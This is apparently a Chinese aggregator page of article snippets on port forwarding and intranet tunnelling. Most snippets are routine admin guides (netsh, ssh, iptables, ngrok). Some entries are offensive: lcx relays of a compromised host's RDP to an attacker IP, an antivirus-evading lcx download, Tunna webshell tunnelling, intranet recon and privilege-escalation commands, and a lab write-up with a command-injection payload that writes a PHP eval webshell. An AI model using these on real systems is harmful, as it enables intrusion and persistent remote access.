首页
Python
Java
IOS
Andorid
NodeJS
JavaScript
HTML5
Windows 内网转发端口
2024-11-03
windows tcp端口映射或端口转发
windows tcp端口映射或端口转发 windows内部有一个叫netsh的玩意,可以把tcp端口进行映射或转发,可惜不支持udp.举个例子:一台windows有一个80端口,对外可以访问.另有一个99端口,不能对外访问,只能本机访问. 现在就用这个功能,把80端口映射到99端口,来实现外部访问本机80端口,实际上是访问了本机的99端口.过程:(下面的端口都指tcp端口) 1.打开cmd 2.安装: 非XP只需要 netsh interface ipv4 install XP除了需要跑这条外
Linux通过端口转发来访问内网服务(端口转发访问阿里云Redis数据库等服务)
# 安装rinetd wget http://www.boutell.com/rinetd/http/rinetd.tar.gz&&tar -xvf rinetd.tar.gz&&cd rinetd sed -i 's/65536/65535/g' rinetd.c (修改端口范围) mkdir /usr/man&&make&&make install 说明:IP的端口是双字节,也就是256*256-1, 256*256对计算机来说就是0,因
ssh 端口转发实现外网 80 端口映射到内网 80 端口
开发中经常需要外网服务映射到本机内网服务的需要,便于调试. 以前都是同事帮着配,这两天自己也看了一下 ssh 端口转发. 同事分分钟钟搞定的事情,自己折腾了 2 天, 真是弱爆了. 最初老想不明白一件事,为什们外网服务器能够找到我的内网机器,现在才明白原来走的是 ssh 隧道. 需求我的内网机器 192.168.9.100, 我的阿里云外网 123.56.86.52, 现在需要所有对 123.56.86.52 80 端口的访问都映射到 192.168.9.100 的 80 端口. 显然
Linux渗透+SSH内网转发
http://www.jb51.net/hack/58514.html http://blog.chinaunix.net/uid-756931-id-353243.html http://blog.163.com/czg_e/blog/static/46104561201552423342331?ignoreua http://www.noah.org/wiki/SSH_tunnel http://www.myhack58.com/Article/60/63/2013/38396_3.htm
Tunna内网转发
Tunna和reduh原理一样.. 使用方法: 上传源码包中文件夹webshell下的脚本至网站目录 然后本地进行连接上传的webshell即可 python proxy.py -u http://172.0.0.1/conn.php -l 1234 -r 3389 -v 这样就转发了webshell所在主机的3389到你本地的1234上,本地直接远程127.0.0.1:1234即可 python proxy.py -u http://172.0.0.1/conn.php -l 1234 -a
lcx.exe内网转发命令教程 + LCX免杀下载
作者: 小健 本机: lcx -listen 2222 3333 2222为转发端口,3333为本机任意未被占用的端口 肉鸡:lcx -slave 119.75.217.56 2222 127.0.0.1 3389 119.75.217.56 为本机IP,2222为转发端口,127.0.0.1为肉鸡内网IP,3389为远程终端端口 3389连接时格式 127.0.0.1:3333 今天刚刚第一次使用,特此共享! 另外提供我的免杀lcx.exe 提供给大家下载. 下载是:http://www.xi
windows内网渗透技巧
1.(windows)无扫描器情况下内网存活主机探测: for /l %i in (1,1,255) do @ping 192.168.1.%i -w 1 -n 1 | find /i "ttl" 2.(windows)查找域中计算机名对应ip: FOR /F "eol=- tokens=1 delims=\ " %a IN ('net view') DO @(echo name: %a, ip: & ping %a -w 1 -n 1 | find /i
NAT123内网映射端口
在无内网路由管理员权限的情况下,需要将内网web应用暴露到公网访问,此时需要用到花生壳或者nat123(两个应用都不是免费的,其中花生壳可以8元认证,以后免费使用,nat123按天收费) 花生壳 http://hsk.oray.com/download/ nat123 http://www.nat123.com/Pages_2_32.jsp 在此以Nat123为说明 微信公众号需要用到80端口验证,所以,此处 80(http)网站 为例,应用名随便写,建议与web应用同名,便于区分,内网
两台windows内网之间快速复制大量(上百万个)小文件(可用于两台服务器之间)
用各种FTP工具(各种主动被动)都不好使.经测试,用以下的(协议.工具等),在双千兆网卡下,传输大量1M的文件可以达到每秒60多M: windows文件共享(SMB协议)(若是08 r2 数据中心版,则需要配置“功能”中的“文件服务”):若无法成功启用网络发现,请启动以下服务 Function Discovery Resource Publication SSDP Discovery UPnP Device Host 升级网卡驱动.系统提示是最新驱动,但可能不是最新的,需要到网卡厂商官网或其他地
iptables 实现内网转发上网
介绍 通过iptables做nat转发实现所有内网服务器上网. 操作 首先开启可以上网的服务器上的内核路由转发功能.这里我们更改/etc/sysctl.conf 配置文件. [root@web1 /]# sed -i '$a net.ipv4.ip_forward = 1' /etc/sysctl.conf [root@web1 /]# cat /etc/sysctl.conf # sysctl settings are defined through files in # /usr/lib/s
lcx 内网转发
把放置到已经控制的内网主机 执行 内网主机输入命令lcx.exe -slave 外网ip 外网端口 内网ip 内网端口lcx.exe -slave 30.1.85.55 2222 127.0.0.1 3389 外网主机输入命令lcx.exe -listen 2222 3388 打开 mstsc ip:3388
Windows实现内网IPMI端口转发
https://www.cnblogs.com/yunweis/p/8024346.html
Windows内网渗透提权的几个实用命令
1.获取操作系统信息 查看所有环境变量:set 识别系统体系结构:echo %PROCESSOR_ARCHITECTURE% AMD64 识别操作系统名称及版本:systeminfo 查看某特定用户信息:net user 2.获取网络信息 查看路由表信息:route print 查看ARP缓存信息:arp -A 查看防火墙规则:netstat -ano 3.应用程序及服务信息 查看计划任务:schtasks /QUERY 查看服务进程ID:tasklist 查看安装驱动:DRIVERQUERY
使用Sunny-grok实现内网转发
Sunny-grok 申请地址:http://www.ngrok.cc ngrok.cfg配置: server_addr: "server.ngrok.cc:4443" auth_token: "xxxxxxxxx" #授权token,在www.ngrok.cc平台注册账号获取 tunnels: sunny: subdomain: "yueshen1314" #定义服务器分配域名前缀,跟平台上的要一样 proto: http: 4040 #映射端
内网转发ngrok的使用
1.下载解压ngrok:https://ngrok.com/download 2.执行ngrok会打开控制台 3.输入命令,开始映射本地的8080端口 ngork http 8080 控制台会返回一个url,该url就是映射到你电脑的8080端口. 每次重启ngrok或电脑,返回的url都是随机的. 有部分教程说注册获得token,有了token就允许自定义三级域名,但我尝试了提示需要付费才允许自定义三级域名.
i春秋DMZ大型靶场实验(三)内网转发DMZ2
更具实验文件知道存在源码泄露 下载源码进行源码审计 发现admin账号 查看user.php 发现mysql 账号 端口 对登录后源码进行审计 发现上传文件的两处漏洞 对 fiel name 可以 %00 截断 上传一句话木马 对file name shell_exec 未对参数过滤 可以拼接执行 命令 写一句话 例如 '|| echo "<?php eval($_POST[1])?>" >/var/www/html/2.php||' 菜刀连接 上传脏牛提权
http内网转发
package main import ( "io" "log" "net/http" "strings" ) func main() { localHost := "127.0.0.1.8001" targetHost := "127.0.0.1:80" httpsServer(localHost, targetHost) log.Fatalln("http server d
linux下内网端口转发工具:linux版lcx [实现远程内网维护]
这个工具以前使用的初衷是内网渗透,需要将内网ssh端口转发到外网服务器上.但这个工具同样适用于运维工程师进行远程内网维护. 当然这一切的前提是内网可以访问外网,检测方法当然就是直接ping 一个外网IP即可. 这个工具之前折腾了很久发现有点不稳定,断掉无法重新连接,昨晚重新调整了下命令参数总算可以正常使用,稳定性妥妥的. linux版lcx工具下载 linux版lcx端口转发2016.6.10 - 12.04 Kb lcx使用方法: Usage:./portmap -m method [-h1
vIDC v2.0 强大的端口转发神器使用总结-开放内网tfs代码服务
vIDC2.0 端口映射工具,最近在公司闲来无事,想自己整个tfs来管理自己的研究代码. 本来是想用微软Visual Studio提供的免费tfs,但是无奈速度太慢.他们的服务器在美国,中国也没有代理.签入签出一个东西要老命了 .那怎么办呢. 后来想想自己家里有台牛B的机器,我为什么不自己搭一个呢. 但是没有外网IP.然后就有了后面研究端口转发的东西.得益于几年前的对黑客知识狂热痴迷.想当年买各种黑客X档案,一起黑别人服务器的日子很有意思 :-) 不过那些都是往事了.现在不干那些了. 有两个方案
SSH 内网端口转发实战
导读 大家都知道SSH是一种安全的传输协议,用在连接服务器上比较多.不过其实除了这个功能,它的隧道转发功能更是吸引人. 如果两个内网之间的linux服务器需要互相登录,或需要互相访问内网某个端口,担忧没有公网IP,可以使用的方法有ngrok(https://ngrok.com/),但并不方便,我们只需两条 SSH 命令即可. 先给出本文主角,两条SSH命令: 远程端口转发(由远程服务器某个端口转发到本地内网服务器端口) ssh -CfNg -R(命令行的关键) 2222(远程服务器端口):127
iptables端口转发规则(内网端口转外网端口)
需求:外网124.202.173.118需要访问 10.45.225.70的内网54032端口,10.45.225.70服务器有公网地址139.129.109.81将内网地址端口转发到外网地址端口,并允许其他外网地址访问内网端口 1.操作iptables规则之前执行 iptables-save>/etc/init.d/iptables.up.rules #将内存中执行的规则保存到配置中,防止内存中运行了没有保存的规则,下次丢失规则,无法从配置文件中载入 2.添加转发规则,添加在INPUT链之前
热门专题
ios uitextview 复制粘贴 不能上下滑动
Hutool 姓名和地址脱敏
mac python 找不到文件
Delphi 读取txt中文乱码
java通过http读取数据
微信小程序中图片被识别为 octet-stream
vue post请求404
如何用refuse部署windows 10
SAP检验特性的各个字段是什么意思
离心角外边的圆是什么
jmeter session保持
将CommandLineRunner转成bean
mybatis 父类属性
vue3 引用el-popover下拉树形
pads中如何把PCB文件所有封装导到库中
subprocess怎么实时更新返回值
matlab保存fig图片代码
arcscene三维模型怎么导入su
centos7如何使用rdp连接
ldap未授权访问漏洞怎么解决